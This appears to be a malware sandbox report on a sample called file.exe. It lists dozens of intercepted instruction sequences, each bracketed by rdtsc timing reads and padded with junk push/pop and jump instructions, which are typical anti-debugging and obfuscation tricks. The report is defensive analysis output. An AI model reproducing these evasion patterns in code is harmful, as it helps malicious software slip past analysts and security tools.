                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3477 second address: 5C3487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C34F0 second address: 5C34F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C391C second address: 5C3925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3925 second address: 5C3984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F935581Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F96F9355818h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 add edi, 3875ACE6h 0x0000002d stc 0x0000002e push 00000004h 0x00000030 pushad 0x00000031 sub dword ptr [ebp+122D2992h], eax 0x00000037 mov si, 727Bh 0x0000003b popad 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F96F9355826h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3984 second address: 5C3996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F91F29AEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3CD0 second address: 5C3CD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3CD4 second address: 5C3CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C4117 second address: 5C411D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C411D second address: 5C4121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FAEC5 second address: 5FAED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F96F9355816h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FAED0 second address: 5FAED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FAED9 second address: 5FAEDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB029 second address: 5FB02D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB02D second address: 5FB039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB19A second address: 5FB1A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB1A0 second address: 5FB1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F96F9355824h 0x0000000c jbe 00007F96F9355816h 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB2F9 second address: 5FB31D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F96F91F29B9h 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB31D second address: 5FB325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5FB4C3 second address: 5FB4CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F96F91F29A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5779F4 second address: 577A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F96F9355820h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60055F second address: 600576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 js 00007F96F91F29A6h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F96F91F29A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600576 second address: 60057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60057A second address: 6005A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F96F91F29B1h 0x0000000e popad 0x0000000f jo 00007F96F91F29B4h 0x00000015 jl 00007F96F91F29AEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6006FB second address: 6006FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6006FF second address: 600705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600705 second address: 60070A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600877 second address: 60088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F96F91F29B1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600CE5 second address: 600CE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600CE9 second address: 600CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6001F2 second address: 600215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F96F9355827h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600215 second address: 60021D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60021D second address: 60023A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F96F9355828h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60023A second address: 600242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 600242 second address: 600248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6010E4 second address: 601102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29B8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60153D second address: 601541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 601541 second address: 60154B instructions: 0x00000000 rdtsc 0x00000002 js 00007F96F91F29B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60154B second address: 601551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 604CF4 second address: 604CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 607D73 second address: 607D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5800D9 second address: 5800DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5800DD second address: 5800FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F9355829h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5800FC second address: 580124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29B7h 0x00000007 push ecx 0x00000008 jns 00007F96F91F29A6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 580124 second address: 58012A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58012A second address: 580130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 580130 second address: 580135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 580135 second address: 58015E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F96F91F29BDh 0x00000008 jmp 00007F96F91F29B1h 0x0000000d jg 00007F96F91F29A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 jnl 00007F96F91F29A6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 607A56 second address: 607A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a je 00007F96F9355816h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 607A66 second address: 607A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 607A71 second address: 607A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AA6B second address: 60AA87 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F96F91F29A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F96F91F29AEh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AA87 second address: 60AA8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ABB6 second address: 60ABBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ABBA second address: 60ABCA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F96F9355816h 0x00000008 js 00007F96F9355816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ABCA second address: 60ABDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F91F29ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ABDB second address: 60AC1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007F96F935582Ch 0x0000000f jng 00007F96F935582Fh 0x00000015 jmp 00007F96F9355823h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6128FE second address: 612918 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007F96F934F1F2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612918 second address: 61291E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61181A second address: 611820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3B63 second address: 5C3B7A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F96F95D6D6Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5C3B7A second address: 5C3B84 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F96F934F1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6119A9 second address: 6119AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6119AD second address: 6119C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F934F1F5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6119C8 second address: 6119D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F96F95D6D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 611B2A second address: 611B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F96F934F1EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F96F934F1F5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 611B57 second address: 611B63 instructions: 0x00000000 rdtsc 0x00000002 js 00007F96F95D6D66h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 611B63 second address: 611B6E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F96F934F1E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61260F second address: 61261A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61261A second address: 612620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6161AE second address: 6161B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6161B2 second address: 6161D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F96F934F1EBh 0x00000017 popad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6161D3 second address: 6161DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F96F95D6D66h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616375 second address: 61638F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F96F934F1ECh 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F96F934F1E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61669A second address: 61669E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61669E second address: 6166BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F96F934F1F2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6166BD second address: 6166CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F95D6D6Dh 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6166CF second address: 6166D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6166D5 second address: 6166D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6166D9 second address: 6166DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61682D second address: 616831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619723 second address: 619733 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F934F1E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619733 second address: 61973D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96F95D6D66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61973D second address: 619743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619743 second address: 619756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F96F95D6D66h 0x00000009 je 00007F96F95D6D66h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619756 second address: 61975C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619899 second address: 6198A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F95D6D6Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6198A7 second address: 6198C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F96F934F1E6h 0x00000008 jmp 00007F96F934F1EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 js 00007F96F934F1E6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622A0A second address: 622A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F96F95D6D6Ch 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622A1E second address: 622A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622A24 second address: 622A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F96F95D6D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581BC3 second address: 581BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jnl 00007F96F934F1F3h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581BE7 second address: 581BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581BEE second address: 581BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581BF4 second address: 581BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581BFA second address: 581BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620B10 second address: 620B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F95D6D72h 0x00000009 jmp 00007F96F95D6D75h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ebx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6212E4 second address: 6212E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62275C second address: 622769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F96F95D6D66h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 622769 second address: 622779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F96F934F1EBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 625F5B second address: 625F6D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F96F95D6D66h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 625F6D second address: 625F7B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F96F934F1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
